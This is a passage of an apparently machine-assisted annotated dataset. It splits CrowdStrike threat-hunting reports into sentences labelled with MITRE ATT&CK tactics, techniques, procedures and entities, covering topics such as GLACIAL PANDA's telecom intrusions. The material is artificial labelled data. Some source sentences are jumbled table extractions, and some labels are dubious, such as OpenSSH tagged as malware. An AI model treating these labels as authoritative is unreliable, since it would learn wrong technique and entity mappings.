"context_before": "the telecommunications sector over the past 12 months.", "sentence_text": "This high-value sector offers significant intelligence value, making telecommunications entities prime targets for stealthy threat actors.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p14-s94-aa7f6f", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 14, "sentence_id": 94, "context_before": "This high-value sector offers significant intelligence value, making telecommunications entities prime targets for stealthy threat actors.", "sentence_text": "The sector is similarly valuable to threat hunters, as focused hunting efforts at telecommunications entities can often uncover new adversaries and TTPs.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p14-s95-23855e", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 14, "sentence_id": 95, "context_before": "The sector is similarly valuable to threat hunters, as focused hunting efforts at telecommunications entities can often uncover new adversaries and TTPs.", "sentence_text": "conducting concurrent operations on the same target network, particularly at telecommunications entities.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p14-s96-ab953b", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 14, "sentence_id": 96, "context_before": "conducting concurrent operations on the same target network, particularly at telecommunications entities.", "sentence_text": "Threat actors who conduct long-term intelligence collection operations in specialized telecommunications environments often share several high-level TTPs.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p14-s97-08ede6", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 14, "sentence_id": 97, "context_before": "Threat actors who conduct long-term intelligence collection operations in specialized telecommunications environments often share several high-level TTPs.", "sentence_text": "Deep knowledge of threat actors’ characteristic behaviors can enable threat hunters to separate and track these threat actors’ activities, leading to new insights.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p14-s98-bf9884", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 14, "sentence_id": 98, "context_before": "Deep knowledge of threat actors’ characteristic behaviors can enable threat hunters to separate and track these threat actors’ activities, leading to new insights.", "sentence_text": "GLACIAL PANDA — a China-nexus adversary dominating the telecommunications industry — represents such an insight.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p14-s99-8d6887", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 14, "sentence_id": 99, "context_before": "GLACIAL PANDA — a China-nexus adversary dominating the telecommunications industry — represents such an insight.", "sentence_text": "After extensive proactive hunting efforts by CrowdStrike OverWatch, CrowdStrike Intelligence introduced GLACIAL PANDA as the latest China-nexus adversary to specialize in this “long game” approach to intelligence collection operations targeting telecommunications entities.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p14-s100-dd2167", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 14, "sentence_id": 100, "context_before": "After extensive proactive hunting efforts by CrowdStrike OverWatch, CrowdStrike Intelligence introduced GLACIAL PANDA as the latest China-nexus adversary to specialize in this “long game” approach to intelligence collection operations targeting telecommunications entities.", "sentence_text": "In uncovering yet another China-nexus threat actor targeting the space, the CrowdStrike OverWatch team further demonstrated its skill in quickly and efficiently hunting these enterprising adversaries.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p15-s101-8e2ef1", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 15, "sentence_id": 101, "context_before": "In uncovering yet another China-nexus threat actor targeting the space, the CrowdStrike OverWatch team further demonstrated its skill in quickly and efficiently hunting these enterprising adversaries.", "sentence_text": "EXECUTIVE SUMMARY\nCASE STUDY:\nHunting GLACIAL PANDA Living off the Land GLACIAL PANDA highly likely conducts targeted intrusions for intelligence collection purposes, accessing and exfiltrating call detail records and related communications telemetry from multiple telecommunications organizations.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0009", "name": "Collection" }, { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1078", "name": "Valid Accounts" }, { "id": "T1005", "name": "Data from Local System" }, { "id": "T1041", "name": "Exfiltration Over C2 Channel" } ], "procedure": "Conduct targeted intrusions to access and exfiltrate call detail records and communications telemetry from telecommunications organizations.", "entities": [ { "text": "GLACIAL PANDA", "start": 72, "end": 85, "label": "ThreatActor" }, { "text": "conducts targeted intrusions for intelligence collection purposes, accessing and exfiltrating call detail records and related communications telemetry from multiple telecommunications organizations", "start": 100, "end": 297, "label": "Action" } ] }, { "uid": "crowdstrike-45_crowdstrike_report-p15-s102-d063b0", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 15, "sentence_id": 102, "context_before": "EXECUTIVE SUMMARY\nCASE STUDY:\nHunting GLACIAL PANDA Living off the Land GLACIAL PANDA highly likely conducts targeted intrusions for intelligence collection purposes, accessing and exfiltrating call detail records and related communications telemetry from multiple telecommunications organizations.", "sentence_text": "This activity could have significant privacy implications for the organizations’ customers.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p15-s103-2fa9e5", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 15, "sentence_id": 103, "context_before": "This activity could have significant privacy implications for the organizations’ customers.", "sentence_text": "The adversary primarily targets Linux systems typical in the telecommunications industry, including legacy operating system distributions that support older telecommunications technologies.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p15-s104-13ef32", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 15, "sentence_id": 104, "context_before": "The adversary primarily targets Linux systems typical in the telecommunications industry, including legacy operating system distributions that support older telecommunications technologies.", "sentence_text": "GLACIAL PANDA\nTarget\nNotable TTPs Geography Initial access via internet-facing (and frequently unmanaged) servers, Afghanistan likely achieved through software exploitation or weak password provisioning Hong Kong", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p15-s105-76a083", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 15, "sentence_id": 105, "context_before": "GLACIAL PANDA\nTarget\nNotable TTPs Geography Initial access via internet-facing (and frequently unmanaged) servers, Afghanistan likely achieved through software exploitation or weak password provisioning Hong Kong", "sentence_text": "Primarily targets Linux systems, employing LOTL techniques and abusing India legitimate user accounts for lateral movement and persistence Japan", "relevant": "yes", "tactic": [ { "id": "TA0008", "name": "Lateral Movement" }, { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1078", "name": "Valid Accounts" } ], "procedure": "Abuse legitimate user accounts to move laterally and maintain persistence on Linux systems using living-off-the-land techniques.", "entities": [ { "text": "employing LOTL techniques and abusing India legitimate user accounts for lateral movement and persistence", "start": 33, "end": 138, "label": "Action" } ] }, { "uid": "crowdstrike-45_crowdstrike_report-p15-s106-529c12", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 15, "sentence_id": 106, "context_before": "Primarily targets Linux systems, employing LOTL techniques and abusing India legitimate user accounts for lateral movement and persistence Japan", "sentence_text": "Deploys ShieldSlide trojanized OpenSSH components to collect user authentication sessions and credentials Kenya Collects telecom sector-specific data, including call detail records, Malaysia network telemetry, and error logs Mexico Panama Vulnerabilities Exploited Target Sectors Philippines CVE-2016-5195 vulnerability (aka Dirty COW)", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" }, { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1556", "name": "Modify Authentication Process" }, { "id": "T1003", "name": "OS Credential Dumping" }, { "id": "T1005", "name": "Data from Local System" } ], "procedure": "Deploy trojanized OpenSSH components to collect authentication sessions, credentials, and telecom-related data including call detail records, network telemetry, and error logs.", "entities": [ { "text": "Deploys ShieldSlide trojanized OpenSSH components to collect user authentication sessions and credentials", "start": 0, "end": 105, "label": "Action" }, { "text": "Collects telecom sector-specific data, including call detail records, Malaysia network telemetry, and error logs", "start": 112, "end": 224, "label": "Action" }, { "text": "ShieldSlide", "start": 8, "end": 19, "label": "MalwareTool" }, { "text": "OpenSSH", "start": 31, "end": 38, "label": "MalwareTool" } ] }, { "uid": "crowdstrike-45_crowdstrike_report-p15-s107-d5f62b", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 15, "sentence_id": 107, "context_before": "Deploys ShieldSlide trojanized OpenSSH components to collect user authentication sessions and credentials Kenya Collects telecom sector-specific data, including call detail records, Malaysia network telemetry, and error logs Mexico Panama Vulnerabilities Exploited Target Sectors Philippines CVE-2016-5195 vulnerability (aka Dirty COW)", "sentence_text": "Telecommunications Taiwan CVE-2021-4034 vulnerability (aka PwnKit)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p16-s109-182acd", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 16, "sentence_id": 109, "context_before": "Thailand U.S.", "sentence_text": "EXECUTIVE SUMMARY\nVULNERABILITY HUNTING\nThe CrowdStrike 2025 Global Threat Report revealed that 52% of vulnerabilities observed by CrowdStrike in 2024 were related to initial access, with exploitation of internet-exposed applications remaining a prevalent initial access method.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p16-s110-bfc48a", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 16, "sentence_id": 110, "context_before": "EXECUTIVE SUMMARY\nVULNERABILITY HUNTING\nThe CrowdStrike 2025 Global Threat Report revealed that 52% of vulnerabilities observed by CrowdStrike in 2024 were related to initial access, with exploitation of internet-exposed applications remaining a prevalent initial access method.", "sentence_text": "Effective exposure and vulnerability management is crucial in addressing the worst-case scenario: zero-day vulnerability exploitation.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p16-s111-c875e8", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 16, "sentence_id": 111, "context_before": "Effective exposure and vulnerability management is crucial in addressing the worst-case scenario: zero-day vulnerability exploitation.", "sentence_text": "In critical vulnerability situations, a defense-in-depth strategy is essential.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p16-s112-34ec23", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 16, "sentence_id": 112, "context_before": "In critical vulnerability situations, a defense-in-depth strategy is essential.", "sentence_text": "Integrating CrowdStrike OverWatch's threat hunting capabilities with exposure management tools and solutions can provide a vital backstop, mitigating damage during the crucial period before a patch is released.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p16-s113-3626c0", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 16, "sentence_id": 113, "context_before": "Integrating CrowdStrike OverWatch's threat hunting capabilities with exposure management tools and solutions can provide a vital backstop, mitigating damage during the crucial period before a patch is released.", "sentence_text": "When adversaries such as GRACEFUL SPIDER develop and deploy zero-day exploits to bypass existing patches, CrowdStrike OverWatch's ability to identify and hunt for post-exploitation malicious behaviors acts as a critical fail-safe, ensuring rapid and effective coverage against subsequent widespread exploitation by opportunistic adversaries.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "Adversaries develop and deploy zero-day exploits to bypass existing patches and enable subsequent exploitation.", "entities": [ { "text": "GRACEFUL SPIDER", "start": 25, "end": 40, "label": "ThreatActor" }, { "text": "develop and deploy zero-day exploits to bypass existing patches", "start": 41, "end": 104, "label": "Action" } ] }, { "uid": "crowdstrike-45_crowdstrike_report-p17-s114-336728", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 17, "sentence_id": 114, "context_before": "When adversaries such as GRACEFUL SPIDER develop and deploy zero-day exploits to bypass existing patches, CrowdStrike OverWatch's ability to identify and hunt for post-exploitation malicious behaviors acts as a critical fail-safe, ensuring rapid and effective coverage against subsequent widespread exploitation by opportunistic adversaries.", "sentence_text": "EXECUTIVE SUMMARY\nConclusion\nThe past 12 months marked a defining chapter in the evolution of threat hunting.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p17-s115-da299f", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 17, "sentence_id": 115, "context_before": "EXECUTIVE SUMMARY\nConclusion\nThe past 12 months marked a defining chapter in the evolution of threat hunting.", "sentence_text": "Whether motivated by financial gain, espionage, or long-term access, enterprising adversaries are exploiting complexity, leveraging trusted relationships, and moving beyond traditional attack surfaces to evade detection.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p17-s116-00a721", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 17, "sentence_id": 116, "context_before": "Whether motivated by financial gain, espionage, or long-term access, enterprising adversaries are exploiting complexity, leveraging trusted relationships, and moving beyond traditional attack surfaces to evade detection.", "sentence_text": "operate in silos.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p17-s117-bd5319", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 17, "sentence_id": 117, "context_before": "operate in silos.", "sentence_text": "The CrowdStrike 2025 Threat Hunting Report underscores that proactive, intelligence-driven hunting is essential.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p17-s118-90cbcf", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 17, "sentence_id": 118, "context_before": "The CrowdStrike 2025 Threat Hunting Report underscores that proactive, intelligence-driven hunting is essential.", "sentence_text": "As adversaries sharpen their capabilities, the CrowdStrike Counter Adversary Operations team remains resolute in detecting and disrupting the world’s most sophisticated threat actors.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p17-s119-5a2350", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 17, "sentence_id": 119, "context_before": "As adversaries sharpen their capabilities, the CrowdStrike Counter Adversary Operations team remains resolute in detecting and disrupting the world’s most sophisticated threat actors.", "sentence_text": "This commitment ensures that wherever the adversary goes, the team is already there.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p18-s120-47507f", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 18, "sentence_id": 120, "context_before": "This commitment ensures that wherever the adversary goes, the team is already there.", "sentence_text": "By offloading time-intensive, repetitive tasks, agentic AI empowers human analysts to focus on proactive threat hunting and hypothesis-driven investigation, elevating both strategic impact and operational efficiency.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p18-s121-de2319", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 18, "sentence_id": 121, "context_before": "By offloading time-intensive, repetitive tasks, agentic AI empowers human analysts to focus on proactive threat hunting and hypothesis-driven investigation, elevating both strategic impact and operational efficiency.", "sentence_text": "Organizations should adopt phishing-resistant MFA solutions, such as hardware security keys, to prevent unauthorized access.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p18-s122-8fd841", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 18, "sentence_id": 122, "context_before": "Organizations should adopt phishing-resistant MFA solutions, such as hardware security keys, to prevent unauthorized access.", "sentence_text": "Identity threat detection tools must monitor behavior across endpoints and on-premises, cloud, and SaaS environments to flag privilege escalation, unauthorized access, and backdoor account creation.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p18-s123-4b6203", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 18, "sentence_id": 123, "context_before": "Identity threat detection tools must monitor behavior across endpoints and on-premises, cloud, and SaaS environments to flag privilege escalation, unauthorized access, and backdoor account creation.", "sentence_text": "Integrating these tools with extended detection and response (XDR) platforms ensures comprehensive visibility and a unified defense against adversaries.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p18-s124-5ebbe7", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 18, "sentence_id": 124, "context_before": "Integrating these tools with extended detection and response (XDR) platforms ensures comprehensive visibility and a unified defense against adversaries.", "sentence_text": "Additionally, organizations should educate users to recognize vishing and phishing attempts while maintaining proactive monitoring to detect and respond to identity-based threats.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p18-s125-5c2b10", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 18, "sentence_id": 125, "context_before": "Additionally, organizations should educate users to recognize vishing and phishing attempts while maintaining proactive monitoring to detect and respond to identity-based threats.", "sentence_text": "Eliminate cross-domain visibility gaps Adversaries’ growing use of hands-on-keyboard techniques and legitimate tools makes detection and response more difficult.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p18-s126-c7b6b1", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 18, "sentence_id": 126, "context_before": "Eliminate cross-domain visibility gaps Adversaries’ growing use of hands-on-keyboard techniques and legitimate tools makes detection and response more difficult.", "sentence_text": "Unlike traditional malware, these methods allow attackers to bypass legacy security measures by executing commands and using legitimate software to mimic normal operations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p18-s127-b2226c", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 18, "sentence_id": 127, "context_before": "Unlike traditional malware, these methods allow attackers to bypass legacy security measures by executing commands and using legitimate software to mimic normal operations.", "sentence_text": "To counter this, organizations must modernize their detection and response strategies.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p18-s128-fd3bc8", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 18, "sentence_id": 128, "context_before": "To counter this, organizations must modernize their detection and response strategies.", "sentence_text": "Agentic AI-powered triage and investigations can extend these capabilities, autonomously analyzing signals across domains to surface high-fidelity insights and prioritize real threats.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p18-s129-52ad75", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 18, "sentence_id": 129, "context_before": "Agentic AI-powered triage and investigations can extend these capabilities, autonomously analyzing signals across domains to surface high-fidelity insights and prioritize real threats.", "sentence_text": "Proactive threat hunting and threat intelligence further enhance detection by identifying potential attack patterns and providing insights into adversary TTPs.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p19-s130-6f94ba", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 19, "sentence_id": 130, "context_before": "Proactive threat hunting and threat intelligence further enhance detection by identifying potential attack patterns and providing insights into adversary TTPs.", "sentence_text": "EXECUTIVE SUMMARY\nDefend the cloud as core infrastructure Cloud-focused adversaries are exploiting misconfigurations, stolen credentials, and cloud management tools to infiltrate systems, move laterally, and maintain persistent access for malicious activities like data theft and ransomware deployment.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0008", "name": "Lateral Movement" }, { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1078", "name": "Valid Accounts" } ], "procedure": "Adversaries exploit misconfigurations and stolen credentials to infiltrate systems, move laterally, and maintain persistent access.", "entities": [ { "text": "Cloud-focused adversaries", "start": 58, "end": 83, "label": "ThreatActor" }, { "text": "are exploiting misconfigurations, stolen credentials, and cloud management tools to infiltrate systems, move laterally, and maintain persistent access", "start": 84, "end": 234, "label": "Action" } ] }, { "uid": "crowdstrike-45_crowdstrike_report-p19-s131-4180bd", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 19, "sentence_id": 131, "context_before": "EXECUTIVE SUMMARY\nDefend the cloud as core infrastructure Cloud-focused adversaries are exploiting misconfigurations, stolen credentials, and cloud management tools to infiltrate systems, move laterally, and maintain persistent access for malicious activities like data theft and ransomware deployment.", "sentence_text": "Cloud-native application protection platforms (CNAPPs) with cloud detection and response (CDR)\ncapabilities are critical to counter these threats.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p19-s132-ac0ab3", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 19, "sentence_id": 132, "context_before": "Cloud-native application protection platforms (CNAPPs) with cloud detection and response (CDR)\ncapabilities are critical to counter these threats.", "sentence_text": "Regular audits are also critical to maintaining security.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p19-s133-5de93d", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 19, "sentence_id": 133, "context_before": "Regular audits are also critical to maintaining security.", "sentence_text": "Frequent reviews of cloud environments ensure unused permissions and outdated configurations are promptly addressed.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p19-s134-bcdbc5", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 19, "sentence_id": 134, "context_before": "Frequent reviews of cloud environments ensure unused permissions and outdated configurations are promptly addressed.", "sentence_text": "Prioritize vulnerabilities with an adversary-centric approach Adversaries are increasingly exploiting publicly disclosed vulnerabilities and using exploit chaining, combining multiple vulnerabilities to gain rapid access, escalate privileges, and bypass defenses.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0004", "name": "Privilege Escalation" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" }, { "id": "T1068", "name": "Exploitation for Privilege Escalation" } ], "procedure": "Exploit publicly disclosed vulnerabilities and chain multiple exploits to gain access, escalate privileges, and bypass defenses.", "entities": [ { "text": "Adversaries", "start": 62, "end": 73, "label": "ThreatActor" }, { "text": "exploiting publicly disclosed vulnerabilities and using exploit chaining, combining multiple vulnerabilities to gain rapid access, escalate privileges, and bypass defenses", "start": 91, "end": 262, "label": "Action" } ] }, { "uid": "crowdstrike-45_crowdstrike_report-p19-s135-02e2e8", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 19, "sentence_id": 135, "context_before": "Prioritize vulnerabilities with an adversary-centric approach Adversaries are increasingly exploiting publicly disclosed vulnerabilities and using exploit chaining, combining multiple vulnerabilities to gain rapid access, escalate privileges, and bypass defenses.", "sentence_text": "These multi-stage attacks often rely on public resources like proof-of-concept (POC) exploits and technical blogs, enabling adversaries to craft effective and hard-to-detect payloads.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p19-s136-50d8ba", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 19, "sentence_id": 136, "context_before": "These multi-stage attacks often rely on public resources like proof-of-concept (POC) exploits and technical blogs, enabling adversaries to craft effective and hard-to-detect payloads.", "sentence_text": "Monitoring for subtle signs of exploit chaining, such as unexpected crashes or privilege escalation attempts, can help detect attacks before they progress.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p19-s137-48dea9", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 19, "sentence_id": 137, "context_before": "Monitoring for subtle signs of exploit chaining, such as unexpected crashes or privilege escalation attempts, can help detect attacks before they progress.", "sentence_text": "Know the adversary and be prepared When a cyberattack unfolds in minutes — or even seconds — being prepared can be the difference between containment and catastrophe.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p19-s138-04fa09", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 19, "sentence_id": 138, "context_before": "Know the adversary and be prepared When a cyberattack unfolds in minutes — or even seconds — being prepared can be the difference between containment and catastrophe.", "sentence_text": "Though technology is critical to detect and stop intrusions, the end user remains a crucial link in the chain to stop breaches.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p19-s139-5fe70e", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 19, "sentence_id": 139, "context_before": "Though technology is critical to detect and stop intrusions, the end user remains a crucial link in the chain to stop breaches.", "sentence_text": "Organizations should initiate user awareness programs to combat the continued threat of phishing and related social engineering techniques.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p19-s140-2ef6b0", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 19, "sentence_id": 140, "context_before": "Organizations should initiate user awareness programs to combat the continued threat of phishing and related social engineering techniques.", "sentence_text": "For security teams, practice makes perfect.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p19-s141-034879", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 19, "sentence_id": 141, "context_before": "For security teams, practice makes perfect.", "sentence_text": "Encourage an environment that routinely performs tabletop exercises and red/blue teaming to identify gaps and eliminate weaknesses in your cybersecurity practices and response.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p20-s142-046685", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 20, "sentence_id": 142, "context_before": "Encourage an environment that routinely performs tabletop exercises and red/blue teaming to identify gaps and eliminate weaknesses in your cybersecurity practices and response.", "sentence_text": "EXECUTIVE SUMMARY\nDownload\nthe Full Report The CrowdStrike 2025 Threat Hunting Report presents a comprehensive analysis of the most significant trends and events in cyber threat activity in 2025.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p20-s143-64cab2", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 20, "sentence_id": 143, "context_before": "EXECUTIVE SUMMARY\nDownload\nthe Full Report The CrowdStrike 2025 Threat Hunting Report presents a comprehensive analysis of the most significant trends and events in cyber threat activity in 2025.", "sentence_text": "Download a free copy of the report at About modern security with the world’s most advanced cloud-native platform for protecting critical areas of enterprise risk — endpoints and cloud workloads, identity and data.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p20-s144-f24156", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 20, "sentence_id": 144, "context_before": "Download a free copy of the report at About modern security with the world’s most advanced cloud-native platform for protecting critical areas of enterprise risk — endpoints and cloud workloads, identity and data.", "sentence_text": "Learn more: www.crowdstrike.com Follow us: Blog | X | LinkedIn", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p20-s145-813e39", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 20, "sentence_id": 145, "context_before": "Learn more: www.crowdstrike.com Follow us: Blog | X | LinkedIn", "sentence_text": "| YouTube Start a free trial today: www.crowdstrike.com/free-trial-guide", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p2-s1-8d93e1", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 2, "sentence_id": 1, "context_before": "", "sentence_text": "Foreword\nDon’t Underestimate Today’s Enterprising Adversaries Watch any nature program, and you’ll quickly discover what happens to animals that underestimate their adversaries.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p2-s2-d59423", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 2, "sentence_id": 2, "context_before": "Foreword\nDon’t Underestimate Today’s Enterprising Adversaries Watch any nature program, and you’ll quickly discover what happens to animals that underestimate their adversaries.", "sentence_text": "They become prey.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p2-s3-24a685", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 2, "sentence_id": 3, "context_before": "They become prey.", "sentence_text": "The same principle applies in cybersecurity — the adversary is advancing so fast that you can’t afford to underestimate them.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p2-s4-db9458", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 2, "sentence_id": 4, "context_before": "The same principle applies in cybersecurity — the adversary is advancing so fast that you can’t afford to underestimate them.", "sentence_text": "Take generative artificial intelligence (genAI), for instance.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p2-s5-ae3992", "source": "crowdstrike", "doc_id": 